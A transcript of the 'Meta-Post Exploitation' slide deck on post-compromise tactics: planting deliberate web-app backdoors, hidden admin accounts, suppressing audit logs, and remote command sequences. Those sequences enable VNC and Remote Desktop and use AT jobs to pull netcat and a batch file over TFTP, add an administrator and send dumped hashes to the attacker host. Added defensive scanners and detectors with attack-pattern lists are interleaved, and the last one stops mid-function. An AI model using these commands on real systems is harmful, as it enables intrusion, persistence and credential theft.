Meta-Post Exploitation
Transcript of the slide deck "Meta-Post Exploitation" (Val Smith, Colin Ames)
Slide 1
Meta-Post Exploitation
Val Smith (valsmith@offensivecomputing.net)
Colin Ames (amesc@offensivecomputing.net)
Using Old, Lost, Forgotten Knowledge
Slide 2
Valsmith
– Affiliations
  • Offensive Computing
  • Metasploit
  • cDc
– Work:
  • Malware Analyst
  • Reverse Engineer
  • Penetration Tester
  • Exploit developer
Slide 3
Colin Ames
– Security Researcher, Offensive Computing
– Steganography Research
– Penetration Testing
– Reverse Engineering
– Malware Analysis
Slide 4
• What is this?
  – Follow up to Val's and HD Moore's Tactical Exploitation talk from last year
  – A talk about the use of automation and tactical tools post-exploitation
  – Applied techniques
  – Good for LARGE environments
  – Different perspectives: some old, some forgotten, some new
Slide 5
Post Exploitation Concepts Overview
Slide 6
What Is Post Exploitation?
• It's what you do after you get root
  – Note: This talk assumes you have access
• Includes:
  – Password Management
  – Persistence
  – Stealth / Evading Detection
  – User Identity Theft
  – Feature Modification
  – Automation & Mass 0wnage
Slide 7
What Is Post Exploitation?
• Getting root is just the beginning
  – How do you spread?
  – How to manage assets as you go along?
• Lots of tools to help you get root
  – Metasploit, Core, Canvas, stand-alone
• But what about after breaking in?
  – Lots of random tools
  – Little automation / standardization
  – Archaic, hard to use, poorly documented
  – Maliciousness often obvious
  – Not scalable to 1000's of hosts (ignoring botnets for this talk)
Slide 8
Password Management
Slide 9
Why Password Management?
– Large pentests: 1000's of passwords
– Testing a cracked password on many systems can be time consuming
– Keeping track of cracking sessions
– Building and growing your wordlist lets you crack faster
– Aids in cleanup stage
  • Tying accounts to systems
Slide 10
Password Management Goals
– Acquired password storage
– Organization and tracking
  • What passwords go with which hosts
  • What passwords are shared
  • Which users have access to what resources
– Re-use for further access
– Expanding wordlist for faster cracking
Slide 11
Password Management Stages & Techniques
– Acquiring: pwdump, cat /etc/shadow, cachedump, sql query, sniffing
– Decisions: Prioritize accounts to crack
– Cracking: John, l0pht, Cain
– Tracking: Nothing
– Reusing: Core Impact
Slide 12
Manual Password Management
• Existing Tools
  – L0phtCrack
    • Stores passwords in session files
  – Cain&Abel
    • Static table, difficult to export / use / automate
    • Password Classification (NTLM, Cisco, SQL, md5)
  – Core Impact
    • Good for automated reuse of passwords against many hosts
    • No real storage / management capability
  – Text file / John the Ripper
    • Many people's method
    • Quick and dirty, not easily scalable
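The tracking problem slides 9-12 describe (which hashes go with which hosts, which are shared, which hosts an account was present on) is what the cleanup and reporting stage needs answered. The following is an added example written for this transcript, not the speakers' MetaPass tool or any code from the talk: it ingests pwdump-format output per host and produces that report. Host names and hashes are constructed (the LM and NT constants for an empty password are the well-known public values).

```python
"""Added example: a credential-reuse tracker over pwdump-style output.

Not code from the talk or its MetaPass tool.  Input is a constructed sample
(made-up hosts and made-up hashes); pwdump lines have the form
user:RID:LM-hash:NT-hash:::.  Grouping by NT hash answers the slide's three
questions: which passwords go with which hosts, which are shared, and which
hosts an account was present on, which is also what the cleanup stage needs.
"""
from collections import defaultdict
from typing import Dict, List, NamedTuple, Tuple

# Well-known LM hash of an empty / disabled LM password (a public constant).
EMPTY_LM = "aad3b435b51404eeaad3b435b51404ee"
# Well-known NT hash of an empty password (a public constant).
NT_EMPTY = "31d6cfe0d16ae931b73c59d7e0c089c0"


class Cred(NamedTuple):
    host: str
    user: str
    rid: int
    lm_hash: str
    nt_hash: str


def parse_pwdump(host: str, text: str) -> List[Cred]:
    """Parse pwdump-format lines dumped from one host; malformed lines raise."""
    creds = []
    for line in text.splitlines():
        line = line.strip()
        if not line or line.startswith("#"):
            continue
        fields = line.split(":")
        if len(fields) < 4 or not fields[1].isdigit():
            raise ValueError(f"{host}: malformed pwdump line: {line!r}")
        creds.append(Cred(host, fields[0], int(fields[1]),
                          fields[2].lower(), fields[3].lower()))
    return creds


def group_by_nt_hash(creds: List[Cred]) -> Dict[str, List[Tuple[str, str]]]:
    """Map each NT hash to the (host, user) pairs that carry it."""
    groups = defaultdict(list)
    for c in creds:
        groups[c.nt_hash].append((c.host, c.user))
    return dict(groups)


def shared_passwords(creds: List[Cred]) -> Dict[str, List[Tuple[str, str]]]:
    """NT hashes present on more than one host: one cracked password opens them all."""
    shared = {}
    for nt, owners in group_by_nt_hash(creds).items():
        if len({host for host, _ in owners}) > 1:
            shared[nt] = sorted(set(owners))
    return shared


def hosts_for_user(creds: List[Cred], user: str) -> List[str]:
    """Every host on which an account name was seen (ties accounts to systems)."""
    return sorted({c.host for c in creds if c.user.lower() == user.lower()})


def lm_present(creds: List[Cred]) -> List[Tuple[str, str]]:
    """Accounts that still store a real LM hash and therefore crack fastest."""
    return sorted((c.host, c.user) for c in creds if c.lm_hash != EMPTY_LM)


# Constructed sample: three hosts, made-up 32-hex-digit hashes.
SAMPLE_DUMPS = {
    "ws01": f"""Administrator:500:{EMPTY_LM}:11111111111111111111111111111111:::
Guest:501:{EMPTY_LM}:{NT_EMPTY}:::
svc_backup:1001:55555555555555555555555555555555:22222222222222222222222222222222:::""",
    "ws02": f"""Administrator:500:{EMPTY_LM}:11111111111111111111111111111111:::
helpdesk:1002:{EMPTY_LM}:44444444444444444444444444444444:::""",
    "srv01": f"""Administrator:500:{EMPTY_LM}:33333333333333333333333333333333:::
svc_backup:1001:{EMPTY_LM}:22222222222222222222222222222222:::""",
}


def load_sample() -> List[Cred]:
    """Parse every constructed dump into one credential list."""
    creds = []
    for host, dump in SAMPLE_DUMPS.items():
        creds.extend(parse_pwdump(host, dump))
    return creds


if __name__ == "__main__":
    creds = load_sample()
    for nt, owners in shared_passwords(creds).items():
        print(f"shared NT hash {nt[:8]}...: {owners}")
    print("svc_backup seen on:", hosts_for_user(creds, "svc_backup"))
    print("LM hashes still stored:", lm_present(creds))
```

In the sample the local Administrator password is shared by ws01 and ws02 and the svc_backup password by ws01 and srv01, which is exactly the "what passwords are shared" finding the slide wants tracked; the LM check is a bonus because slide 11 lists l0pht and Cain as crackers and an LM hash is what they crack quickest.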
Slide 13
Slide 14
• MetaPass
• Demos
Slide 15
Persistence
Slide 16
A word on Stealth vs Persistence
– In the old days a rootkit helped you maintain root
– Today rootkits are all about hiding
– These two concepts still go hand in hand
Slide 17
Persistence
• Persistence is maintaining access
• Why?
  – Targets can get patched
  – Some exploits are 1 shot only
  – Sometimes you need to return multiple times to the target
  – Target's usefulness not always immediately known
• Goals: Access target as often as needed / useful
• Huge area of study
• Sometimes persistence doesn't matter
Slide 18
Persistence
• Stages of Persistence
  – Initial access
    • Exploit
    • Stolen password, etc.
  – Decisions: What tool to use?
    • FUZZY – OS, Environment, Target dependent
  – Setup
  – Re-accessing of target
  – Cleanup: Don't be a slob, it will get you caught
    • When you no longer need the target, leave no trace
Slide 19
Persistence
• Existing tools
  – Rootkits
  – Backdoors
  – Trojans
  – Port knockers
  – Adding accounts
  – Things like netcat backdoors, inetd modifications, process injection, stealing credentials, etc.
Slide 20
Persistence
• Different perspective on persistence
  – If you can always re-exploit, who cares?
  – Inject / add / modify new vulnerabilities
    • Hard to determine maliciousness
    • We all know it's hard to find bugs now; imagine someone is purposefully putting the bugs in
Slide 21
Persistence
• Leveraging existing persistent admin access
  • Nagios checks
  • Attack Configuration Management
    – Cfengine
    – SMS
    – Automated Patching Systems ("patch" them with our trojans)
  • GUI's
  • Tool distribution
Slide 22
Persistence
• Example
• Machine has VNC installed
• Replace installed VNC with vulnerable version
  – Authentication bypass
• Copy registry password so target doesn't realize
• Persistence with no backdoors or rootkits to get detected
Slide 23
Persistence
• Add vulnerable code
• Example: web apps
  – Take out user input validation
  – Inject your vulnerable code
• Focus on vague intent
• Never be obviously and solely malicious
  – Look for apps with previous vulnerabilities
  – Re-introduce patched bugs
Slide 24
Persistence
• More web app examples
• Add hidden field to HTML form
  – Users detect no change, app performs normally
    <input type="hidden" name="Lang">
• Edit web app and tie vuln perl code to form field input
    if (defined $hidden_field) { open($filename, ">$hidden_field"); }
• Craft a POST including the hidden field
Slide 25
Persistence
• www.target.com/cgi-bin/app.cgi?lang=|cmd|
• Code will execute your commands
• Who needs to bind a shell to a port?
• Unlikely to ever be detected
  – Especially good in big apps
  – Code review can't even be sure of maliciousness
  – Some sites replace code every X time period
• No rootkits to install
• Tripwire probably won't see this
Slide 26
Persistence
• Take concept to another level
  – Add a decoder to web app
  – Look for a "trigger" string combination in form fields
  – If Name = John Smith and Age = 42 then execute contents of Address field
  – URL encode form entries containing commands
  – Have identifier "stub" in encoded data for app to find
Slide 27
Persistence
• Mixing Stealth with Persistence
  – Further encoding
  – Take entries from all fields
  – Concat them
  – "Decode" commands
  – Rotational Ciphers (rot 13, Caesar)
  – Even more complex obfuscation
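Slides 24-27 rest on a code pattern a reviewer can look for: a two-argument Perl open() whose mode and path come from request data (a leading "|" or ">" in that string is honoured by Perl), fed by a form field that users never see. The following added example, written for this transcript and not code from the talk, does that review statically: it flags open() calls whose mode/path is built from data, and cross-references hidden inputs in the HTML with the CGI parameters the script actually reads. The Perl and HTML inputs are constructed to mirror the slides.

```python
"""Added example: static review for the backdoor pattern in slides 24-27.

Not code from the talk.  It scans Perl CGI source for open() calls whose
mode/path is built from data (the two-argument open with an interpolated
variable that the slide shows), and cross-references hidden form fields in
the HTML with the CGI parameters the script reads, so a hidden field that
only the code "knows about" stands out in review.  Inputs are constructed.
"""
import re
from typing import List, NamedTuple

OPEN_CALL = re.compile(r"\bopen\s*\(([^)]*)\)")         # args without nested parens
PARAM_READ = re.compile(r"""\bparam\(\s*["']([^"']+)["']\s*\)""")
INPUT_TAG = re.compile(r"<input\b[^>]*>", re.I)
ATTR = re.compile(r"""(\w+)\s*=\s*["']?([^"'\s>]+)""")


class Finding(NamedTuple):
    line: int
    severity: str
    reason: str
    code: str


def split_args(arglist: str) -> List[str]:
    """Split a Perl argument list on commas, ignoring commas inside quotes."""
    args, buf, quote = [], [], None
    for ch in arglist:
        if quote:
            buf.append(ch)
            if ch == quote:
                quote = None
        elif ch in "\"'":
            quote = ch
            buf.append(ch)
        elif ch == ",":
            args.append("".join(buf).strip())
            buf = []
        else:
            buf.append(ch)
    if buf:
        args.append("".join(buf).strip())
    return args


def is_literal(arg: str) -> bool:
    return len(arg) >= 2 and arg[0] == arg[-1] and arg[0] in "\"'"


def interpolates(arg: str) -> bool:
    """Double-quoted strings interpolate $var/@var; single-quoted ones do not."""
    if arg.startswith('"'):
        return bool(re.search(r"[$@]\w", arg))
    return not is_literal(arg)          # bare variable or expression


def scan_perl(source: str) -> List[Finding]:
    """Report open() calls whose mode/path can be influenced by data."""
    findings = []
    for lineno, line in enumerate(source.splitlines(), 1):
        for m in OPEN_CALL.finditer(line):
            args = split_args(m.group(1))
            if len(args) == 2:
                target = args[1]
                bare = target.strip("\"'").strip()
                if interpolates(target):
                    findings.append(Finding(lineno, "high",
                        "2-arg open: mode/path taken from data, a leading | runs a command",
                        m.group(0)))
                elif bare.startswith("|") or bare.endswith("|"):
                    findings.append(Finding(lineno, "medium",
                        "2-arg open runs a fixed command", m.group(0)))
            elif len(args) >= 3 and interpolates(args[1]):
                findings.append(Finding(lineno, "high",
                    "3-arg open with non-literal mode", m.group(0)))
    return findings


def params_read(source: str) -> List[str]:
    """CGI parameter names the script reads via param('...')."""
    return sorted(set(PARAM_READ.findall(source)))


def hidden_fields(html: str) -> List[str]:
    """Names of <input type="hidden"> fields in the form."""
    names = []
    for tag in INPUT_TAG.findall(html):
        attrs = {k.lower(): v for k, v in ATTR.findall(tag)}
        if attrs.get("type", "").lower() == "hidden" and "name" in attrs:
            names.append(attrs["name"])
    return names


def hidden_fields_read_by_code(html: str, source: str) -> List[str]:
    """Hidden fields the script consumes: each one deserves a reviewer's question."""
    return sorted(set(hidden_fields(html)) & set(params_read(source)))


# Constructed inputs shaped after the slides (not a real application).
SAMPLE_PERL = r'''#!/usr/bin/perl
use CGI qw(param);
my $lang = param('lang');
my $hidden_field = param('Lang');
my $filename;
open(my $log, '>>', '/var/log/app.log') or die "log: $!";
if (defined $hidden_field) { open($filename, ">$hidden_field"); }
open(PIPE, "sort -r |");
'''
SAMPLE_HTML = ('<form method="post"><input type="text" name="lang">'
               '<input type="hidden" name="Lang"></form>')

if __name__ == "__main__":
    for f in scan_perl(SAMPLE_PERL):
        print(f"line {f.line} [{f.severity}] {f.reason}: {f.code}")
    print("hidden fields read by code:", hidden_fields_read_by_code(SAMPLE_HTML, SAMPLE_PERL))
```

The three-argument open on line 6 of the sample is not reported because its mode is a literal; line 7 (the slide's construct) is reported as high, and the fixed pipe open on line 8 as medium. The scanner only handles open() with unnested arguments; system(), exec() and backticks are the other sinks a full review would add.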
Slide 28
Persistence
• Covert Accounts
  – Add an account / re-enable
  – Modify local account policies to allow access
    • Ex: SUPPORT_3848576b1, guest
  – Add it to the admin group (net localgroup)
• Only use AT to run your commands
• Persistence without adding files / new accounts
  – Unlikely to be discovered
Slide 29
• DEMOS
Slide 30
Stealth / Evading Detection
Slide 31
Stealth / Evading Detection
• Hiding your activity
  – From:
    • IDS
    • AV
    • LOGGING
    • Suspicious users & admins
    • Firewalls
    • Process listing
Slide 32
Stealth / Evading Detection
• Why Stealth?
  – If you get caught, you get stopped
  – The longer you can operate undetected, the more you can accomplish
  – Admins won't fix problems they don't know exist (helps persistence)
  – On a pen test you should also be testing the organization's detection and response capabilities
Slide 33
Stealth / Evading Detection
• Goals
  – Keep system operable
    • If it breaks you can't use it
    • Someone will come fix it
  – Operate without fear of detection
  – Robustness
    • Hiding shouldn't require constant attention
  – DON'T LOOK MALICIOUS
Slide 34
Stealth / Evading Detection
• Manual / Existing Tools
  – Rootkits, rootkits, rootkits
  – Meterpreter
  – Encryption
    • Shellcode Encoders for IDS evasion
  – Log cleaners
  – Packers
  – Covert channels / Steganography
  – Anti-analysis / anti-forensics
• See all of OC's other talks
• Also Vinnie Liu's Metasploit research
Slide 35
Stealth / Evading Detection
• Different Perspective
  – DON'T BE AN ANOMALY
  – Hide in plain sight
    • Many tools have ONLY malicious uses
    • Make your intent hard to determine
  – Be noisy on one to divert attention from another
Slide 36
Stealth / Evading Detection
• Different Perspective
  – Know the target's environment better than they do
    • If they don't use encryption, maybe you shouldn't either
    • Change strategies to match the environment's normal behavior
  – Don't always default to exploits
    • See Tactical Exploitation talk
    • IDS's can't see normal behavior that is malicious
Slide 37
Stealth / Evading Detection
• Using Windows security objects for stealth
  – Auditing of Securable Objects is controlled by SACLs
  – Null SACL = No Auditing = No Logs
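Slide 37's point is that the SACL, not the audit policy alone, decides whether an object ever produces a Security-log entry, so an object whose SACL has been nulled or emptied is silent. A defender can inventory that silence from exported security descriptors. The following added example, written for this transcript and not code from the talk, parses SDDL strings (the textual form tools print for a security descriptor), pulls out the system-audit ACEs and reports each object's audit coverage; the object names and descriptors are constructed.

```python
"""Added example: finding securable objects whose SACL produces no audit log.

Not code from the talk.  The slide's point is that auditing is driven by the
SACL, so an object with a null or empty SACL generates no log entries no
matter what the audit policy says.  This parses SDDL strings (as printed by
tools that export security descriptors) and reports the audit coverage of
each one.  The object names and descriptors below are constructed.
"""
import re
from typing import Dict, List, Optional, Tuple

# SDDL: O:owner G:group D:(dacl aces...) S:(sacl aces...); parts may be absent.
COMPONENT = re.compile(r"([OGDS]):((?:(?![OGDS]:).)*)")
ACE = re.compile(r"\(([^)]*)\)")


def parse_sddl(sddl: str) -> Dict[str, str]:
    """Split 'O:..G:..D:..S:..' into its components (only those present)."""
    return {m.group(1): m.group(2) for m in COMPONENT.finditer(sddl)}


def sacl_aces(sddl: str) -> Optional[List[Tuple[str, ...]]]:
    """ACEs of the SACL; [] for an empty SACL, None when there is no S: part."""
    comps = parse_sddl(sddl)
    if "S" not in comps:
        return None
    return [tuple(a.split(";")) for a in ACE.findall(comps["S"])]


def ace_flags(field: str) -> List[str]:
    """SDDL flag fields are concatenated two-letter codes, e.g. 'OICISAFA'."""
    return [field[i:i + 2] for i in range(0, len(field), 2)]


def audit_coverage(sddl: str) -> str:
    """'none', 'success', 'failure' or 'success+failure' for one descriptor."""
    aces = sacl_aces(sddl)
    if not aces:            # None (null SACL) or [] (empty SACL): nothing is logged
        return "none"
    kinds = set()
    for ace in aces:
        if ace[0] != "AU":  # only system-audit ACEs generate events
            continue
        flags = ace_flags(ace[1])
        if "SA" in flags:   # audit successful access
            kinds.add("success")
        if "FA" in flags:   # audit failed access
            kinds.add("failure")
    return "+".join(sorted(kinds, reverse=True)) or "none"


def unaudited(objects: Dict[str, str]) -> List[str]:
    """Names of objects that would never appear in the Security log."""
    return sorted(name for name, sddl in objects.items() if audit_coverage(sddl) == "none")


# Constructed descriptors: a file audited for everyone's successful and failed
# access, a registry key with an empty SACL, a service with no S: part at all,
# and a log file audited for failures only.
SAMPLE_OBJECTS = {
    r"C:\secrets\payroll.xlsx": "O:BAG:SYD:(A;;FA;;;BA)(A;;FR;;;BU)S:(AU;SAFA;FA;;;WD)",
    r"HKLM\SOFTWARE\Acme\Agent": "O:BAG:SYD:(A;;KA;;;BA)(A;;KR;;;BU)S:",
    "Service: AcmeAgent": "O:SYG:SYD:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCLCSWLOCRRC;;;IU)",
    r"C:\secrets\audit.log": "O:BAG:SYD:(A;;FA;;;BA)S:(AU;FA;FA;;;WD)",
}

if __name__ == "__main__":
    for name, sddl in SAMPLE_OBJECTS.items():
        print(f"{name}: audit={audit_coverage(sddl)}")
    print("silent objects:", unaudited(SAMPLE_OBJECTS))
```

Run over a real export, the "silent objects" list is the set to compare against the expected baseline: an object that used to carry an AU ACE and now reports "none" is the condition slide 37 is exploiting.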
Slide 38
• DEMOS
  – Kaspersky squeals like a pig
Slide 39
User Identity Theft
Slide 40
User Identity Theft
• It's not always about ROOT
• Look like someone else
  – Use the credentials / access of another user
• Goals
  – Change your identity at will
    • User ID, domain credentials, sessions
    • Impersonate system accounts
    • Make activities look like normal user behavior
Slide 41
User Identity Theft
• Stages and techniques
  – Target users
    • Who has access to what?
    • Where is the data?
  – Change Identity
    • Hijack credentials / sessions
    • Abuse tokens
  – Access is the end goal, be it data or another system
Slide 42
User Identity Theft
• Existing tools
  – Incognito (metasploit)
    • Enumerate / hijack tokens
  – FU / FUTO
    • Enable SYSTEM privileges
    • Change process privileges (DKOM)
  – SU, SUDO, KSU
  – Process injection
  – Hijack domain credentials
Slide 43
User Identity Theft
Tokens, Privileges, Security Descriptors, SIDs, SACLs, DACLs, ACEs, Oh My!
• What we want
  – Privileges or SIDs
• What we get
  – Access, Access, Access
• How we get it
  – Incognito vs FUto
Slide 44
• DEMOS
Slide 45
Feature Modification
Slide 46
Feature Modification
• Changing existing features or settings to benefit our activities
• Goals
  – Support all Post-Exploitation activities
  – Disabling detection technologies
  – Enabling in-secure or easy to use access software
Slide 47
Feature Modification
• Feature Modification is Basically Securable Object Manipulation
  – Remember all those Tokens and Security Descriptors?
  – These can be modified programmatically and directly
    • Not just through existing tools
  – Stealth / Persistence requirements
    • May make it more advantageous to use custom tools
  – Access Objects programmatically
  – Can be much more complex to implement
Slide 48
Feature Modification
• Re-enabling disabled access
  – PsExec: It's still cool (Thanks Mark)
• Enabling GUI access
  – VNC (from a command line)
  – Remote Desktop (even if disabled)
• Turning off or adding exceptions to security software
  – Firewalls, AV, logging
• Modifying Local Security Policies
Slide 49
Feature Modification
• Enabling psexec
  – Psexec was a great, awesome remote shell / command tool
  – Everybody now disables clipbook, which psexec requires: l4m3
  – Let's re-enable it
Slide 50
Feature Modification
• Enabling psexec
• Use the system control tool sc.exe
  – net use \\target\ipc$ password /user:username
  – sc \\target config netdde start= auto
  – sc \\target config netddedsdm start= auto
  – sc \\target config clipsrv start= auto
  – sc \\target start netdde
  – sc \\target start netddedsdm
  – sc \\target start clipsrv
Slide 51
Feature Modification
• Enabling VNC (from command line)
  – Go get VNC (check out guh.nu)
  – Make a folder on the target for the vnc files
  – Copy the following files to target folder
    • winvnc.exe
    • vnc.reg
    • vnchooks.dll
    • omnithread_rt.dll
  – regedit /s vnc.reg
  – winvnc -install
  – net start "vnc server"
  – winvnc
  – Password is "infected"
vnc.reg file contents:
    Windows Registry Editor Version 5.00

    [HKEY_LOCAL_MACHINE\SOFTWARE\ORL\WinVNC3\Default]
    "SocketConnect"=dword:00000001
    "AutoPortSelect"=dword:00000001
    "InputsEnabled"=dword:00000001
    "LocalInputsDisabled"=dword:00000000
    "IdleTimeout"=dword:00000000
    "QuerySetting"=dword:00000002
    "QueryTimeout"=dword:0000000a
    "PollUnderCursor"=dword:00000000
    "PollForeground"=dword:00000001
    "PollFullScreen"=dword:00000000
    "OnlyPollConsole"=dword:00000001
    "OnlyPollOnEvent"=dword:00000000
    "Password"=hex:10,4d,89,3d,5a,e1,55,f8
Slide 52
Feature Modification
• Enabling Remote Desktop remotely
  – Having a GUI to your target can be necessary
  – Maybe they are running a specialized GUI app
    • Ex: System controlling access to security doors
  – No command line way of modifying system, need GUI
    • SCADA systems
    • Security cameras
    • Who knows what you might be up to
  – Remote desktop is fast and already a feature of the OS
  – However it's often disabled, maybe even by GPO
Slide 53
Feature Modification
• Enabling Remote Desktop remotely
  – Complicated procedure, especially if GPO's involved
  – Create a file named fix_ts_policy.ini:
    [Unicode]
    Unicode=yes
    [Version]
    signature="$CHICAGO$"
    Revision=1
    [Privilege Rights]
    seremoteinteractivelogonright = hacked_account
    seinteractivelogonright = hacked_account
    sedenyinteractivelogonright =
    sedenyremoteinteractivelogonright =
    sedenynetworklogonright =
  – This file will fix policy settings in your way
  – Change "hacked_account" to a real account
Slide 54
Feature Modification
• Enabling Remote Desktop remotely
  – Create another file named enable_ts.reg:
    Windows Registry Editor Version 5.00

    [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server]
    "fDenyTSConnections"=dword:00000000
    "TSEnabled"=dword:00000001
    "TSUserEnabled"=dword:00000000
  – Then perform these commands:
    • sc config termservice start= auto
    • regedit /s enable_ts.reg
    • copy c:\windows\security\database\secedit.sdb c:\windows\security\database\newsecedit.sdb
    • copy c:\windows\security\database\secedit.sdb c:\windows\security\database\origsecedit.sdb
    • secedit /configure /db newsecedit.sdb /cfg fix_ts_policy.ini
    • gpupdate /force
    • net start "terminal services"
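The two files in slides 53-54 are ordinary administrative formats (a secedit security template and a regedit import file), so the same parsers a defender uses to review change requests, or to diff a host's exported policy against its baseline, catch exactly these edits: an unexpected principal granted remote interactive logon, deny rights emptied, and fDenyTSConnections cleared. The following is an added example written for this transcript, not code from the talk; it parses both formats and reports those three conditions. The inputs are constructed from the slide's file contents, and the allow-list of principals expected to hold SeRemoteInteractiveLogonRight is an assumption.

```python
"""Added example: reviewing a secedit template and a .reg file for the
changes in slides 53-54, before they are applied or after the fact.

Not code from the talk.  It parses the INI-style security template that
secedit /configure consumes and the .reg format that regedit /s imports, then
reports who gains remote interactive logon, which deny rights are emptied,
and whether fDenyTSConnections is being cleared.  Inputs are constructed from
the slide; the allow-list of expected RDP principals is an assumption.
"""
import configparser
import re
from typing import Dict, List

REG_VALUE = re.compile(r'^"([^"]+)"=(.*)$')
TS_KEY = r"HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server"


def parse_template(text: str) -> Dict[str, Dict[str, str]]:
    """Security template -> {section: {lower-cased right: raw value}}."""
    cp = configparser.ConfigParser(allow_no_value=True, interpolation=None,
                                   delimiters=("=",))
    cp.read_string(text)
    return {s: {k.lower(): (v or "").strip() for k, v in cp[s].items()}
            for s in cp.sections()}


def principals(value: str) -> List[str]:
    """Right values are comma-separated names or *SID entries."""
    return [p.strip().lstrip("*") for p in value.split(",") if p.strip()]


def parse_reg(text: str) -> Dict[str, Dict[str, object]]:
    """Minimal .reg parser: dword values become ints, strings lose quotes."""
    reg, key = {}, None
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("Windows Registry Editor") or line == "REGEDIT4":
            continue
        if line.startswith("[") and line.endswith("]"):
            key = line[1:-1]
            reg.setdefault(key, {})
            continue
        m = REG_VALUE.match(line)
        if key is None or not m:
            raise ValueError(f"unexpected .reg line: {raw!r}")
        name, data = m.group(1), m.group(2)
        if data.lower().startswith("dword:"):
            reg[key][name] = int(data[6:], 16)
        elif data.startswith('"') and data.endswith('"'):
            reg[key][name] = data[1:-1]
        else:
            reg[key][name] = data        # hex: and other types kept raw
    return reg


def audit(template_text: str, reg_text: str,
          allowed_rdp=("Administrators", "Remote Desktop Users")) -> List[str]:
    """Findings for the three conditions the slides' files produce."""
    findings = []
    rights = parse_template(template_text).get("Privilege Rights", {})
    for who in principals(rights.get("seremoteinteractivelogonright", "")):
        if who not in allowed_rdp:
            findings.append(f"SeRemoteInteractiveLogonRight granted to unexpected principal: {who}")
    for right, value in rights.items():
        if right.startswith("sedeny") and not principals(value):
            findings.append(f"deny right emptied: {right}")
    ts = parse_reg(reg_text).get(TS_KEY, {})
    if ts.get("fDenyTSConnections") == 0:
        findings.append("fDenyTSConnections=0: Remote Desktop connections enabled")
    return findings


# Constructed from the slide's file contents.
SAMPLE_TEMPLATE = """[Unicode]
Unicode=yes
[Version]
signature="$CHICAGO$"
Revision=1
[Privilege Rights]
seremoteinteractivelogonright = hacked_account
seinteractivelogonright = hacked_account
sedenyinteractivelogonright =
sedenyremoteinteractivelogonright =
sedenynetworklogonright =
"""
SAMPLE_REG = r"""Windows Registry Editor Version 5.00

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server]
"fDenyTSConnections"=dword:00000000
"TSEnabled"=dword:00000001
"TSUserEnabled"=dword:00000000
"""

if __name__ == "__main__":
    for line in audit(SAMPLE_TEMPLATE, SAMPLE_REG):
        print(line)
```

On a live host the same checks apply to `secedit /export` output and a `reg export` of the Terminal Server key, which is the practical way to notice that a GPO-disabled Remote Desktop has been turned back on locally.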
Slide 55
• DEMOS
Slide 56
Abusing The Scheduler
Slide 57
Abusing The Scheduler
• Oldschool techniques can get results on new problems
• Remember, this is POST exploitation, so you already have some access
• AT command schedules things to run at a specified time and date
  – Schedule service must be running
Slide 58
Abusing The Scheduler
• Often these days certain features are disabled for security
  – Clipbook, shares, enumeration
• Use AT to get around these problems
  – Usually NOT disabled
    net use \\target\ipc$ password /user:username
    at \\target 12:00 pm command
    Ex: at \\192.168.1.1 12:00pm tftp -i myip GET nc.exe
Slide 59
Abusing The Scheduler
• Often AT is still enabled while many other things you typically use are not
• AT is as good as having a shell
  – Enable / Start Services
  – Transfer files
  – Adding users
  – Messing with the registry / policies
  – Pretty much anything you can do with a shell
  – Added bonus: defaults to run as SYSTEM
Slide 60
Abusing The Scheduler
• Building a tool around AT – Flow
  • Establish authenticated session
  • Determine the time on the target
  • Pass commands to the target to be run 1 min from now
    – Write a batch file that executes everything at once
    – Have the target send you back whatever info you want
    – Be mindful of file transfer protocols; TFTP is good but not always "quiet" or available
Slide 61
Abusing The Scheduler
• Common use example
  – net use \\target
  – net time \\target
  – at \\target (net time + 1 min) "tftp -i <us> GET e.bat"
  – at \\target (net time + 2 min) e.bat
  – e.bat does:
    • Adds a user (net user hacked hacked /add)
      – Admin group (net localgroup administrators hacked /add)
    • Gets hashdumping tools and dumps hashes
    • Sends hashes identified by IP back to attacker host
Slide 62
Abusing The Scheduler
• Privileges of LocalSystem that we care about
  – NT AUTHORITY\SYSTEM and BUILTIN\Administrators SIDs
  – SE_IMPERSONATE_NAME
  – SE_TCB_NAME
  – SE_DEBUG_NAME
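Seen from the host, the sequence in slides 58-61 (a job scheduled to run as SYSTEM, a file pulled over TFTP, then a user created and added to Administrators) is a short run of Security-log events on one machine: scheduled task created (event 602 on XP/2003, 4698 on Vista and later), user account created (624 / 4720) and member added to a local group (636 / 4732). The following added example, written for this transcript and not code from the talk, correlates those events and flags scheduled command lines that should not appear on a workstation. The log lines are a constructed, simplified key=value rendering rather than real event-log output; the event IDs are the real ones.

```python
"""Added example: spotting scheduler-driven account creation in host logs.

Not code from the talk.  Slides 58-61 describe the pattern: an AT job is
created remotely, runs as SYSTEM, pulls a batch file over TFTP, and the batch
file adds a user and puts it in Administrators.  On the defender's side the
same pattern is a short sequence of Security-log events on one host:
scheduled task created (602 on XP/2003, 4698 on Vista and later), user
account created (624 / 4720), member added to a local group (636 / 4732).
The log lines below are a constructed, simplified key=value rendering, not
real event-log output; the event IDs are the real ones.
"""
import re
import shlex
from datetime import datetime, timedelta
from typing import Dict, List

TASK_CREATED = {"602", "4698"}
USER_CREATED = {"624", "4720"}
GROUP_MEMBER_ADDED = {"636", "4732"}

# Command-line fragments that should not normally be scheduled on a workstation.
SUSPICIOUS = [re.compile(p, re.I) for p in (
    r"\btftp\b.*\bget\b",                          # file pulled over TFTP
    r"\bnet\s+user\b.*/add\b",                     # account creation from a job
    r"\bnet\s+localgroup\s+administrators\b.*/add\b",
    r"\bnc(\.exe)?\b|\bnetcat\b",
)]


def parse_line(line: str) -> Dict[str, object]:
    """'<iso-time> k=v k="v with spaces" ...' -> dict with a parsed 'time'."""
    tokens = shlex.split(line)
    event: Dict[str, object] = {"time": datetime.fromisoformat(tokens[0])}
    for tok in tokens[1:]:
        k, _, v = tok.partition("=")
        event[k] = v
    return event


def suspicious_command(cmd: str) -> bool:
    return any(p.search(cmd) for p in SUSPICIOUS)


def detect(lines: List[str], window: timedelta = timedelta(minutes=10)) -> List[Dict[str, str]]:
    """Alerts for suspicious scheduled commands and for account changes that
    follow a scheduled-task creation on the same host within `window`."""
    events = [parse_line(l) for l in lines if l.strip()]
    alerts = []
    for ev in events:
        if ev.get("id") not in TASK_CREATED:
            continue
        detail = str(ev.get("detail", ""))
        if suspicious_command(detail):
            alerts.append({"host": ev["host"], "time": ev["time"].isoformat(),
                           "reason": f"suspicious scheduled command: {detail}"})
        for later in events:
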